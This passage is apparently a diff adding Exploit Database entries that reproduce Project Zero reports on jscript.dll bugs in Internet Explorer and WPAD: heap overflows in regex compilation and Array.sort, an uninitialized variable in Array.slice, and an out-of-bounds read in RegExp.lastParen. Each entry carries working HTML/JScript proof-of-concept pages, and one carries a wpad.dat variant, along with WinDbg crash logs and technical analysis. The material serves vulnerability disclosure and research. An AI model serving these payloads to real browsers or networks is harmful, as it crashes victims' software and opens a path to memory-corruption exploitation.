+13 00000000`129cbdd0 000007fe`eeab46fb MSHTML!CHtmScriptParseCtx::Execute+0x101
+14 00000000`129cbe10 000007fe`ee398a5b MSHTML!CHtmParseBase::Execute+0x235
+15 00000000`129cbeb0 000007fe`ee272e39 MSHTML!CHtmPost::Broadcast+0x90
+16 00000000`129cbef0 000007fe`ee2ccaef MSHTML!CHtmPost::Exec+0x4bb
+17 00000000`129cc100 000007fe`ee2cca40 MSHTML!CHtmPost::Run+0x3f
+18 00000000`129cc130 000007fe`ee2cda12 MSHTML!PostManExecute+0x70
+19 00000000`129cc1b0 000007fe`ee2d0843 MSHTML!PostManResume+0xa1
+1a 00000000`129cc1f0 000007fe`ee2b6fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43
+1b 00000000`129cc240 000007fe`eeae4f78 MSHTML!CDwnChan::OnMethodCall+0x41
+1c 00000000`129cc270 000007fe`ee1d9d75 MSHTML!GlobalWndOnMethodCall+0x240
+1d 00000000`129cc310 00000000`771f9bbd MSHTML!GlobalWndProc+0x150
+1e 00000000`129cc390 00000000`771f98c2 USER32!UserCallWinProcCheckWow+0x1ad
+1f 00000000`129cc450 000007fe`f2694a87 USER32!DispatchMessageWorker+0x3b5
+20 00000000`129cc4d0 000007fe`f269babb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555
+21 00000000`129cf750 000007fe`fe4c572f IEFRAME!LCIETab_ThreadProc+0x3a3
+22 00000000`129cf880 000007fe`efb2925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f
+23 00000000`129cf8b0 00000000`772f59cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f
+24 00000000`129cf900 00000000`7742a561 kernel32!BaseThreadInitThunk+0xd
+25 00000000`129cf930 00000000`00000000 ntdll!RtlUserThreadStart+0x1d
+
+0:014> !heap -p -a 00000000`04518fc8
+    address 0000000004518fc8 found in
+    _DPH_HEAP_ROOT @ 3d31000
+    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
+                                    3d49750:          4518000             2000
+    000007feefb88726 verifier!AVrfDebugPageHeapFree+0x00000000000000a2
+    00000000774c4255 ntdll!RtlDebugFreeHeap+0x0000000000000035
+    000000007746797c ntdll! ?? ::FNODOBFM::`string'+0x000000000000e982
+    000007fefd4b10c8 msvcrt!free+0x000000000000001c
+    000007feedb9bad2 jscript!NativeErrorProtoObj<16>::`vector deleting destructor'+0x0000000000000022
+    000007feedb9b938 jscript!NameTbl::SetMasterVariant+0x000000000000a240
+    000007feedbb42cb jscript!GcAlloc::ReclaimGarbage+0x000000000000034d
+    000007feedb919e2 jscript!GcContext::Reclaim+0x00000000000000ae
+    000007feedba1956 jscript!GcContext::CollectCore+0x000000000000018b
+    000007feedba17a5 jscript!GcContext::Collect+0x0000000000000025
+    000007feedbe42f3 jscript!JsCollectGarbage+0x0000000000000023
+    000007feedb9c2ec jscript!NatFncObj::Call+0x0000000000000138
+    000007feedb9c199 jscript!NameTbl::InvokeInternal+0x0000000000000377
+    000007feedb986ea jscript!VAR::InvokeByDispID+0xffffffffffffffea
+    000007feedb924b8 jscript!CScriptRuntime::Run+0x00000000000005a6
+    000007feedb98ec2 jscript!ScrFncObj::CallWithFrameOnStack+0x0000000000000162
+    000007feedb98d2b jscript!ScrFncObj::Call+0x00000000000000b7
+    000007feedbc2084 jscript!NameTbl::InvokeInternal+0x000000000000060f
+    000007feedb986ea jscript!VAR::InvokeByDispID+0xffffffffffffffea
+    000007feedbf8ee3 jscript!GCProtectKeyAndCall+0x000000000000009f
+    000007feedbf97a6 jscript!JSONApplyFilters+0x000000000000014a
+    000007feedbfa08b jscript!JSONStringifyObject+0x000000000000009b
+    000007feedbf9e77 jscript!JSONStringifyArray+0x0000000000000253
+    000007feedbfa2cc jscript!JSONStringifyObject+0x00000000000002dc
+    000007feedbfec94 jscript!JsJSONStringify+0x00000000000003e4
+    000007feedb9c2ec jscript!NatFncObj::Call+0x0000000000000138
+    000007feedb9a9fe jscript!NameTbl::InvokeInternal+0x00000000000003f8
+    000007feedb9b234 jscript!VAR::InvokeByName+0x000000000000081c
+    000007feedb99852 jscript!VAR::InvokeDispName+0x0000000000000072
+    000007feedb99929 jscript!VAR::InvokeByDispID+0x0000000000001229
+    000007feedb924b8 jscript!CScriptRuntime::Run+0x00000000000005a6
+    000007feedb98ec2 jscript!ScrFncObj::CallWithFrameOnStack+0x0000000000000162
+
+=========================================
+-->
\ No newline at end of file
diff --git a/exploits/windows/dos/43369.html b/exploits/windows/dos/43369.html
new file mode 100644
index 000000000..f50d83fbf
--- /dev/null
+++ b/exploits/windows/dos/43369.html
@@ -0,0 +1,150 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1369
+
+There is a heap overflow in jscript.dll when compiling a regex. This issue could potentially be exploited through multiple vectors:
+
+ - An attacker on the local network could exploit this issue by posing as a WPAD (Web Proxy Auto-Discovery) host and sending a malicious wpad.dat file to the victim. This works because wpad.dat files are JavaScript files interpreted with jscript.dll on the WPAD client. Note that, in this case, an attacker who successfully exploited the vulnerability would gain the same privileges as the WinHTTP Web Proxy Auto-Discovery Service.
+
+ - The issue can also be exploited by opening a malicious web page in Internet Explorer. In this case, due to the sizes involved, a 64-bit tab process would most likely be required to trigger the issue. This is going to be the case for example when running IE in the Enhanced Protected Mode.
+
+The issue has been verified on 64-bit Win7 and 64-bit Win10 with the most recent patches applied.
+
+PoC for Internet Explorer:
+
+============================================
+-->
+
+<!-- saved from url=(0014)about:internet -->
+<html>
+<head>
+<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
+</head>
+<body>
+<script language="Jscript.Encode">
+
+var s = 'a';
+for(var i=0;i<28;i++) {
+  s = s+s;
+}
+s = s+'[a-z]'+s;
+
+r = new RegExp();
+r.compile(s);
+
+</script>
+</body>
+</html>
+
+<!--
+============================================
+
+PoC for WPAD:
+
+============================================
+
+function FindProxyForURL(url, host) {
+
+  var s = 'a';
+  for(var i=0;i<28;i++) {
+    s = s+s;
+  }
+  s = s+'[a-z]'+s;
+
+  r = new RegExp();
+  r.compile(s);
+
+  return "DIRECT";
+}
+
+===========================================
+
+Technical details:
+
+The issue is in RegExpComp::Compile (and several functions called from RegExpComp::Compile). RegExpComp::Compile is responsible for compiling a RegExp object. It maintains a buffer with the compilation result and extends it when necessary. Extending the buffer is handled using RegExpBase::EnsureSpace which looks (approximately) like:
+
+void RegExpBase::EnsureSpace(int desired_size) {
+  if(desired_size > buffer_size) {
+    if(2 * desired_size < desired_size) {
+      //throw an exception
+    }
+    int new_size = 2 * desired_size;
+    char * new_buffer = realloc(buffer, new_size);
+    if(!new_buffer) {
+      //throw an exception     
+    }
+    buffer = new_buffer;
+    buffer_size = new_size;
+  }
+}
+
+Note that desired_size is a signed 32-bit integer. RegExpBase::EnsureSpace has an integer overflow check, however if an overflow happens in the caller (a caller must add the size which it wants to append to the existing content size) and desired_size becomes negative, RegExpBase::EnsureSpace would simply return because of the first if() statement without attempting to extend the buffer.
+
+Indeed, integer overflows can happen in the several callers of RegExpBase::EnsureSpace. The one being triggered in the PoC is in RegExpComp::Compile, when it attempts to append the raw input string to the buffer towards the end of the compilation process.
+
+Debug log (from IE, but it looks similar in the WPAD service):
+
+============================================
+
+(b90.698): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+msvcrt!memcpy+0x1d9:
+000007fe`fefe123d 668901          mov     word ptr [rcx],ax ds:00000002`5bb60fe0=????
+
+0:012> r
+rax=0000000040000061 rbx=00000000042b7ea0 rcx=000000025bb60fe0
+rdx=fffffffdfa4b0010 rsi=00000000042b5f48 rdi=000000004000000a
+rip=000007fefefe123d rsp=0000000012399ef8 rbp=0000000012399f28
+ r8=0000000040000008  r9=0000000000000000 r10=6100610061006100
+r11=000000021bb60fd8 r12=0000000016010fe8 r13=000007feebc91670
+r14=0000000020000001 r15=0000000000000000
+iopl=0         nv up ei pl nz na pe nc
+cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
+msvcrt!memcpy+0x1d9:
+000007fe`fefe123d 668901          mov     word ptr [rcx],ax ds:00000002`5bb60fe0=????
+
+0:012> k
+ # Child-SP          RetAddr           Call Site
+00 00000000`12399ef8 000007fe`ebc88bb3 msvcrt!memcpy+0x1d9
+01 00000000`12399f00 000007fe`ebcfacc2 jscript!RegExpComp::Compile+0x1b7
+02 00000000`12399f60 000007fe`ebce2118 jscript!RegExpComp::CompileDynamic+0x62
+03 00000000`12399fa0 000007fe`ebce3310 jscript!RegExpObj::Compile+0x32c
+04 00000000`1239a0f0 000007fe`ebc7c2ec jscript!JsRegExpCompile+0x70
+05 00000000`1239a140 000007fe`ebc7a9fe jscript!NatFncObj::Call+0x138
+06 00000000`1239a1f0 000007fe`ebc7b234 jscript!NameTbl::InvokeInternal+0x3f8
+07 00000000`1239a310 000007fe`ebc79852 jscript!VAR::InvokeByName+0x81c
+08 00000000`1239a520 000007fe`ebc79929 jscript!VAR::InvokeDispName+0x72
+09 00000000`1239a5a0 000007fe`ebc724b8 jscript!VAR::InvokeByDispID+0x1229
+0a 00000000`1239a5f0 000007fe`ebc78ec2 jscript!CScriptRuntime::Run+0x5a6
+0b 00000000`1239b3f0 000007fe`ebc78d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162
+0c 00000000`1239b600 000007fe`ebc78b95 jscript!ScrFncObj::Call+0xb7
+0d 00000000`1239b6a0 000007fe`ebc7e6c0 jscript!CSession::Execute+0x19e
+0e 00000000`1239b770 000007fe`ebc870e7 jscript!COleScript::ExecutePendingScripts+0x17a
+0f 00000000`1239b840 000007fe`ebc868d6 jscript!COleScript::ParseScriptTextCore+0x267
+10 00000000`1239b930 000007fe`ecdf5251 jscript!COleScript::ParseScriptText+0x56
+11 00000000`1239b990 000007fe`ed57b320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1
+12 00000000`1239ba10 000007fe`ecdf6256 MSHTML!CScriptCollection::ParseScriptText+0x37f
+13 00000000`1239baf0 000007fe`ecdf5c8e MSHTML!CScriptData::CommitCode+0x3d9
+14 00000000`1239bcc0 000007fe`ecdf5a11 MSHTML!CScriptData::Execute+0x283
+15 00000000`1239bd80 000007fe`ed5b46fb MSHTML!CHtmScriptParseCtx::Execute+0x101
+16 00000000`1239bdc0 000007fe`ece98a5b MSHTML!CHtmParseBase::Execute+0x235
+17 00000000`1239be60 000007fe`ecd72e39 MSHTML!CHtmPost::Broadcast+0x90
+18 00000000`1239bea0 000007fe`ecdccaef MSHTML!CHtmPost::Exec+0x4bb
+19 00000000`1239c0b0 000007fe`ecdcca40 MSHTML!CHtmPost::Run+0x3f
+1a 00000000`1239c0e0 000007fe`ecdcda12 MSHTML!PostManExecute+0x70
+1b 00000000`1239c160 000007fe`ecdd0843 MSHTML!PostManResume+0xa1
+1c 00000000`1239c1a0 000007fe`ecdb6fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43
+1d 00000000`1239c1f0 000007fe`ed5e4f78 MSHTML!CDwnChan::OnMethodCall+0x41
+1e 00000000`1239c220 000007fe`eccd9d75 MSHTML!GlobalWndOnMethodCall+0x240
+1f 00000000`1239c2c0 00000000`77229bbd MSHTML!GlobalWndProc+0x150
+20 00000000`1239c340 00000000`772298c2 USER32!UserCallWinProcCheckWow+0x1ad
+21 00000000`1239c400 000007fe`f29d4a87 USER32!DispatchMessageWorker+0x3b5
+22 00000000`1239c480 000007fe`f29dbabb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555
+23 00000000`1239f700 000007fe`fd73572f IEFRAME!LCIETab_ThreadProc+0x3a3
+24 00000000`1239f830 000007fe`ee62925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f
+25 00000000`1239f860 00000000`773259cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f
+26 00000000`1239f8b0 00000000`7745a561 kernel32!BaseThreadInitThunk+0xd
+27 00000000`1239f8e0 00000000`00000000 ntdll!RtlUserThreadStart+0x1d
+
+============================================
+-->
\ No newline at end of file
diff --git a/exploits/windows/dos/43370.html b/exploits/windows/dos/43370.html
new file mode 100644
index 000000000..f7936e574
--- /dev/null
+++ b/exploits/windows/dos/43370.html
@@ -0,0 +1,117 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1383
+
+There is an heap overflow vulnerability in jscript.dll library (used in IE, WPAD and other places). The bug affects 2 functions, JsArrayStringHeapSort and JsArrayFunctionHeapSort.
+
+PoC for IE (note: page heap might be required to obsorve the crash):
+
+=========================================
+-->
+
+<!-- saved from url=(0014)about:internet -->
+<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
+<script language="Jscript.Encode">
+var vars = new Array(100);
+
+var arr = new Array(1000);
+for(var i=1;i<600;i++) arr[i] = i;
+
+var o = {toString:function() {
+  for(var i=600;i<1000;i++) {
+    arr[i] = 1337;
+  }
+}}
+
+function go() {
+  arr[0] = o;
+  Array.prototype.sort.call(arr);
+}
+
+
+go();
+
+</script>
+
+<!--
+=========================================
+
+Technical details:
+
+Array.sort is implemented in JsArraySort which, depending if a comparison function was specified or not, calls JsArrayStringHeapSort or JsArrayFunctionHeapSort. These (vulnerable) functions take several arguments, 2 of which are the input array length and the number of elements currently in the input array (this can be smaller than the array length). The vulnerable functions are going to allcoate 2 buffers to store intermediate data. The size of these buffers will be calculated based on *num_elements*. However, while filling those arrays it is possible that the number of elements is going to increase, which causes a heap overflow.
+
+Debug log:
+
+=========================================
+
+0:023> g
+(e5c.988): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+jscript!NameTbl::GetValCore+0x30:
+000007fe`f4f59df0 498900          mov     qword ptr [r8],rax ds:00000000`04603010=????????????????
+
+0:013> r
+rax=c0c0c0c0c0c00003 rbx=000000000443cf20 rcx=000000000441df90
+rdx=0000000000000003 rsi=0000000004603010 rdi=000000000441df90
+rip=000007fef4f59df0 rsp=00000000129a8e10 rbp=0000000000000000
+ r8=0000000004603010  r9=000000000441fdc8 r10=00000000040a9800
+r11=00000000129a8e70 r12=0000000003ecb690 r13=0000000000000001
+r14=0000000004603010 r15=0000000000000259
+iopl=0         nv up ei ng nz na pe cy
+cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010283
+jscript!NameTbl::GetValCore+0x30:
+000007fe`f4f59df0 498900          mov     qword ptr [r8],rax ds:00000000`04603010=????????????????
+
+0:013> k
+ # Child-SP          RetAddr           Call Site
+00 00000000`129a8e10 000007fe`f4f75f0e jscript!NameTbl::GetValCore+0x30
+01 00000000`129a8e70 000007fe`f4f761d8 jscript!ArrayObj::GetValAtIndex+0x62
+02 00000000`129a8eb0 000007fe`f4fbd5a2 jscript!ArrayObj::GetVal+0x28
+03 00000000`129a8f40 000007fe`f4fbcd90 jscript!JsArrayStringHeapSort+0x1a6
+04 00000000`129a90d0 000007fe`f4f5c2ec jscript!JsArraySort+0x270
+05 00000000`129a9180 000007fe`f4f5a9fe jscript!NatFncObj::Call+0x138
+06 00000000`129a9230 000007fe`f4f586ea jscript!NameTbl::InvokeInternal+0x3f8
+07 00000000`129a9350 000007fe`f4fadd72 jscript!VAR::InvokeByDispID+0xffffffff`ffffffea
+08 00000000`129a93a0 000007fe`f4f5c2ec jscript!JsFncCall+0xc2
+09 00000000`129a9430 000007fe`f4f5a9fe jscript!NatFncObj::Call+0x138
+0a 00000000`129a94e0 000007fe`f4f5b234 jscript!NameTbl::InvokeInternal+0x3f8
+0b 00000000`129a9600 000007fe`f4f59852 jscript!VAR::InvokeByName+0x81c
+0c 00000000`129a9810 000007fe`f4f59929 jscript!VAR::InvokeDispName+0x72
+0d 00000000`129a9890 000007fe`f4f524b8 jscript!VAR::InvokeByDispID+0x1229
+0e 00000000`129a98e0 000007fe`f4f58ec2 jscript!CScriptRuntime::Run+0x5a6
+0f 00000000`129aa6e0 000007fe`f4f594b3 jscript!ScrFncObj::CallWithFrameOnStack+0x162
+10 00000000`129aa8f0 000007fe`f4f586ea jscript!NameTbl::InvokeInternal+0x2d3
+11 00000000`129aaa10 000007fe`f4f524b8 jscript!VAR::InvokeByDispID+0xffffffff`ffffffea
+12 00000000`129aaa60 000007fe`f4f58ec2 jscript!CScriptRuntime::Run+0x5a6
+13 00000000`129ab860 000007fe`f4f58d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162
+14 00000000`129aba70 000007fe`f4f58b95 jscript!ScrFncObj::Call+0xb7
+15 00000000`129abb10 000007fe`f4f5e6c0 jscript!CSession::Execute+0x19e
+16 00000000`129abbe0 000007fe`f4f670e7 jscript!COleScript::ExecutePendingScripts+0x17a
+17 00000000`129abcb0 000007fe`f4f668d6 jscript!COleScript::ParseScriptTextCore+0x267
+18 00000000`129abda0 000007fe`ec595251 jscript!COleScript::ParseScriptText+0x56
+19 00000000`129abe00 000007fe`ecd1b320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1
+1a 00000000`129abe80 000007fe`ec596256 MSHTML!CScriptCollection::ParseScriptText+0x37f
+1b 00000000`129abf60 000007fe`ec595c8e MSHTML!CScriptData::CommitCode+0x3d9
+1c 00000000`129ac130 000007fe`ec595a11 MSHTML!CScriptData::Execute+0x283
+1d 00000000`129ac1f0 000007fe`ecd546fb MSHTML!CHtmScriptParseCtx::Execute+0x101
+1e 00000000`129ac230 000007fe`ec638a5b MSHTML!CHtmParseBase::Execute+0x235
+1f 00000000`129ac2d0 000007fe`ec512e39 MSHTML!CHtmPost::Broadcast+0x90
+20 00000000`129ac310 000007fe`ec56caef MSHTML!CHtmPost::Exec+0x4bb
+21 00000000`129ac520 000007fe`ec56ca40 MSHTML!CHtmPost::Run+0x3f
+22 00000000`129ac550 000007fe`ec56da12 MSHTML!PostManExecute+0x70
+23 00000000`129ac5d0 000007fe`ec570843 MSHTML!PostManResume+0xa1
+24 00000000`129ac610 000007fe`ec556fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43
+25 00000000`129ac660 000007fe`ecd84f78 MSHTML!CDwnChan::OnMethodCall+0x41
+26 00000000`129ac690 000007fe`ec479d75 MSHTML!GlobalWndOnMethodCall+0x240
+27 00000000`129ac730 00000000`76d19bbd MSHTML!GlobalWndProc+0x150
+28 00000000`129ac7b0 00000000`76d198c2 USER32!UserCallWinProcCheckWow+0x1ad
+29 00000000`129ac870 000007fe`f11a4a87 USER32!DispatchMessageWorker+0x3b5
+2a 00000000`129ac8f0 000007fe`f11ababb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555
+2b 00000000`129afb70 000007fe`fd48572f IEFRAME!LCIETab_ThreadProc+0x3a3
+2c 00000000`129afca0 000007fe`f521925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f
+2d 00000000`129afcd0 00000000`76e159cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f
+2e 00000000`129afd20 00000000`76f4a561 kernel32!BaseThreadInitThunk+0xd
+2f 00000000`129afd50 00000000`00000000 ntdll!RtlUserThreadStart+0x1d
+
+=========================================
+-->
\ No newline at end of file
diff --git a/exploits/windows/dos/43371.html b/exploits/windows/dos/43371.html
new file mode 100644
index 000000000..beb7f876b
--- /dev/null
+++ b/exploits/windows/dos/43371.html
@@ -0,0 +1,138 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1378
+
+There is an uninitialized variable vulnerability in jscript.dll. This issue could potentially be exploited through multiple vectors:
+
+ - By opening a malicious web page in Internet Explorer.
+
+ - [currently untested] An attacker on the local network could exploit this issue by posing as a WPAD (Web Proxy Auto-Discovery) host and sending a malicious wpad.dat file to the victim.
+
+The issue has been verified on 64-bit Windows 10 with the most recent patches applied.
+
+PoC for Internet Explorer (tested on IE 11 with a 64-bit tab process. Might no work very reliably due to the nature of the issue, please see the technical details below):
+
+============================================
+-->
+
+<!-- saved from url=(0014)about:internet -->
+<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
+<script language="Jscript.Encode">
+var x = new URIError(new Array(), undefined, undefined);
+String.prototype.localeCompare.call(x, new Date(0, 0, 0, 0, 0, 0, undefined));
+Array.prototype.slice.call(1);
+</script>
+
+<!--
+============================================
+
+Technical details:
+
+The issue is in jscript!JsArraySlice (Array.prototype.slice.call in the PoC above, all other lines are just fuzzer generated junk that puts the stack into a 'correct' state needed to demonstrate the issue).
+
+JsArraySlice looks approximately like:
+
+int JsArraySlice(CSession *session, VAR *this, VAR *ret, int num_args, VAR *args) {
+  VAR object;
+  VAR length;
+  NameTbl *nametable;
+
+  if(!ConvertToObject(session, this, &object, 0)) {
+    //set error and return
+  }
+  if(!IsJSObject(&object, &nametable)) {
+    //set error and return
+  }
+  if(nametable->GetVal(&g_sym_length, &length) < 0) {
+    //set error and return  
+  }
+  if(length->type != TYPE_INT) {
+    ConvertToScalar(session, &length, &length, 3, 1);
+  }
+
+  ...
+
+}
+
+The issue is that JsArraySlice() expects NameTBL::GetVal() to return an integer <0 if the input object does not contain the 'length' property. However in this case NameTBL::GetVal() will actually return 1. Also, in this case, the length VAR is *not* going to be initialized. Thus if NameTBL::GetVal() returns 1, ConvertToScalar() is going to be called with invalid arguments. Depending on the perceived (uninitialized) type of length VAR, this might lead to exploitable conditions including calling a virtual method on the uninitialized pointer (see below).
+
+Debug log:
+
+============================================
+
+(a3c.bd8): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+jscript!InvokeDispatch+0xbd:
+00007ffa`e45a45fd 488b4008        mov     rax,qword ptr [rax+8] ds:0000004e`00610056=????????????????
+
+0:014> r
+rax=0000004e0061004e rbx=000000f42f0fb400 rcx=00007ffae4630904
+rdx=0000000000000081 rsi=0000000000000002 rdi=00007ffae4630904
+rip=00007ffae45a45fd rsp=000000f42f0fb1e0 rbp=000000f42f0fb2e0
+ r8=000000f42f0fb230  r9=000000f42f0fb2a0 r10=0000000000000080
+r11=5555555511140000 r12=0000000000000000 r13=0000000000000000
+r14=000002a7533c5a70 r15=0000000000000000
+iopl=0         nv up ei pl zr na po nc
+cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
+jscript!InvokeDispatch+0xbd:
+00007ffa`e45a45fd 488b4008        mov     rax,qword ptr [rax+8] ds:0000004e`00610056=????????????????
+
+0:014> k
+ # Child-SP          RetAddr           Call Site
+00 000000f4`2f0fb1e0 00007ffa`e45b548f jscript!InvokeDispatch+0xbd
+01 000000f4`2f0fb380 00007ffa`e45adc2d jscript!AutBlock::AddRef+0x101f
+02 000000f4`2f0fb3d0 00007ffa`e45e048f jscript!ConvertToScalar+0x51
+03 000000f4`2f0fb440 00007ffa`e458265a jscript!JsArraySlice+0x10f
+04 000000f4`2f0fb540 00007ffa`e458b015 jscript!NatFncObj::Call+0x10a
+05 000000f4`2f0fb5f0 00007ffa`e458d75b jscript!NameTbl::InvokeInternal+0x135
+06 000000f4`2f0fb6b0 00007ffa`e45d4d80 jscript!VAR::InvokeByDispID+0x87
+07 000000f4`2f0fb700 00007ffa`e458265a jscript!JsFncCall+0xb0
+08 000000f4`2f0fb780 00007ffa`e458b015 jscript!NatFncObj::Call+0x10a
+09 000000f4`2f0fb830 00007ffa`e458cce0 jscript!NameTbl::InvokeInternal+0x135
+0a 000000f4`2f0fb8f0 00007ffa`e45a7f18 jscript!VAR::InvokeByName+0x580
+0b 000000f4`2f0fbaf0 00007ffa`e45b562b jscript!VAR::InvokeDispName+0x60
+0c 000000f4`2f0fbb70 00007ffa`e4594ccf jscript!AutBlock::AddRef+0x11bb
+0d 000000f4`2f0fbbc0 00007ffa`e45972cd jscript!CScriptRuntime::Run+0x665f
+0e 000000f4`2f0fc520 00007ffa`e4597428 jscript!ScrFncObj::CallWithFrameOnStack+0x15d
+0f 000000f4`2f0fc720 00007ffa`e4588b15 jscript!ScrFncObj::Call+0xb8
+10 000000f4`2f0fc7c0 00007ffa`e45861eb jscript!CSession::Execute+0x265
+11 000000f4`2f0fc920 00007ffa`e4586929 jscript!COleScript::ExecutePendingScripts+0x28b
+12 000000f4`2f0fca00 00007ffa`e4586a06 jscript!COleScript::ParseScriptTextCore+0x239
+13 000000f4`2f0fcaf0 00007ffa`ae439138 jscript!COleScript::ParseScriptText+0x56
+14 000000f4`2f0fcb50 00007ffa`ae4f8f7d MSHTML!CActiveScriptHolder::ParseScriptText+0xb8
+15 000000f4`2f0fcbd0 00007ffa`ae4f827c MSHTML!CScriptCollection::ParseScriptText+0x26d
+16 000000f4`2f0fccb0 00007ffa`ae465a63 MSHTML!CScriptData::CommitCode+0x3b4
+17 000000f4`2f0fce80 00007ffa`ae4657df MSHTML!CScriptData::Execute+0x267
+18 000000f4`2f0fcf40 00007ffa`ae357ea1 MSHTML!CHtmScriptParseCtx::Execute+0xbf
+19 000000f4`2f0fcf70 00007ffa`ae3b8880 MSHTML!CHtmParseBase::Execute+0x181
+1a 000000f4`2f0fd000 00007ffa`ae3b846a MSHTML!CHtmPost::Broadcast+0x50
+1b 000000f4`2f0fd040 00007ffa`ae467fae MSHTML!CHtmPost::Exec+0x39a
+1c 000000f4`2f0fd240 00007ffa`ae469324 MSHTML!CHtmPost::Run+0x32
+1d 000000f4`2f0fd270 00007ffa`ae463b99 MSHTML!PostManExecute+0x70
+1e 000000f4`2f0fd2f0 00007ffa`ae463a60 MSHTML!PostManResume+0xa1
+1f 000000f4`2f0fd330 00007ffa`ae44523c MSHTML!CHtmPost::OnDwnChanCallback+0x40
+20 000000f4`2f0fd380 00007ffa`ae386e21 MSHTML!CDwnChan::OnMethodCall+0x1c
+21 000000f4`2f0fd3b0 00007ffa`ae3adcb9 MSHTML!GlobalWndOnMethodCall+0x251
+22 000000f4`2f0fd460 00007ffa`f1f61c24 MSHTML!GlobalWndProc+0xf9
+23 000000f4`2f0fd4f0 00007ffa`f1f6156c USER32!UserCallWinProcCheckWow+0x274
+24 000000f4`2f0fd650 00007ffa`afa629f7 USER32!DispatchMessageWorker+0x1ac
+25 000000f4`2f0fd6d0 00007ffa`afa9ed04 IEFRAME!CTabWindow::_TabWindowThreadProc+0x5e7
+26 000000f4`2f0ff920 00007ffa`e42c9586 IEFRAME!LCIETab_ThreadProc+0x3a4
+27 000000f4`2f0ffa50 00007ffa`c8b92ed9 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x16
+28 000000f4`2f0ffa80 00007ffa`f2268364 IEShims!NS_CreateThread::AutomationIE_ThreadProc+0x89
+29 000000f4`2f0ffad0 00007ffa`f43e7091 KERNEL32!BaseThreadInitThunk+0x14
+2a 000000f4`2f0ffb00 00000000`00000000 ntdll!RtlUserThreadStart+0x21
+
+0:014> u rip
+jscript!InvokeDispatch+0xbd:
+00007ffa`e45a45fd 488b4008        mov     rax,qword ptr [rax+8]
+00007ffa`e45a4601 ff15c14d0700    call    qword ptr [jscript!_guard_dispatch_icall_fptr (00007ffa`e46193c8)]
+00007ffa`e45a4607 488d442458      lea     rax,[rsp+58h]
+00007ffa`e45a460c 458bc4          mov     r8d,r12d
+00007ffa`e45a460f 4889442448      mov     qword ptr [rsp+48h],rax
+00007ffa`e45a4614 488bd7          mov     rdx,rdi
+00007ffa`e45a4617 488d4580        lea     rax,[rbp-80h]
+00007ffa`e45a461b 498bce          mov     rcx,r14
+
+============================================
+-->
\ No newline at end of file
diff --git a/exploits/windows/dos/43372.html b/exploits/windows/dos/43372.html
new file mode 100644
index 000000000..7e3114ef2
--- /dev/null
+++ b/exploits/windows/dos/43372.html
@@ -0,0 +1,91 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1382
+
+There is an out-of-bounds read in jscript.dll library (used in IE, WPAD and other places):
+
+PoC for IE (note: page heap might be required to obsorve the crash):
+
+=========================================
+-->
+
+<!-- saved from url=(0014)about:internet -->
+<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
+<script language="Jscript.Encode">
+
+function go() {
+  var r= new RegExp(Array(100).join('()'));
+  ''.search(r);
+  alert(RegExp.lastParen);
+}
+
+go();
+
+</script>
+
+<!--
+=========================================
+
+Debug log:
+
+=========================================
+
+(cec.a14): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+jscript!RegExpFncObj::LastParen+0x43:
+000007fe`f23d3813 4863accbac000000 movsxd  rbp,dword ptr [rbx+rcx*8+0ACh] ds:00000000`04770154=????????
+
+0:014> r
+rax=0000000000000063 rbx=000000000476fd90 rcx=0000000000000063
+rdx=0000000000000064 rsi=000000000476fd90 rdi=000007fef23d37d0
+rip=000007fef23d3813 rsp=00000000130f9090 rbp=00000000130f9148
+ r8=00000000130f9210  r9=0000000000000000 r10=000000000463fef0
+r11=000000000463ff38 r12=0000000000000083 r13=0000000000000000
+r14=00000000130f9210 r15=0000000000000000
+iopl=0         nv up ei pl nz na po nc
+cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
+jscript!RegExpFncObj::LastParen+0x43:
+000007fe`f23d3813 4863accbac000000 movsxd  rbp,dword ptr [rbx+rcx*8+0ACh] ds:00000000`04770154=????????
+
+0:014> k
+ # Child-SP          RetAddr           Call Site
+00 00000000`130f9090 000007fe`f2385e6d jscript!RegExpFncObj::LastParen+0x43
+01 00000000`130f90e0 000007fe`f236b293 jscript!NameTbl::GetVal+0x3d5
+02 00000000`130f9170 000007fe`f2369d27 jscript!VAR::InvokeByName+0x873
+03 00000000`130f9380 000007fe`f2368ec2 jscript!CScriptRuntime::Run+0x373
+04 00000000`130fa180 000007fe`f23694b3 jscript!ScrFncObj::CallWithFrameOnStack+0x162
+05 00000000`130fa390 000007fe`f23686ea jscript!NameTbl::InvokeInternal+0x2d3
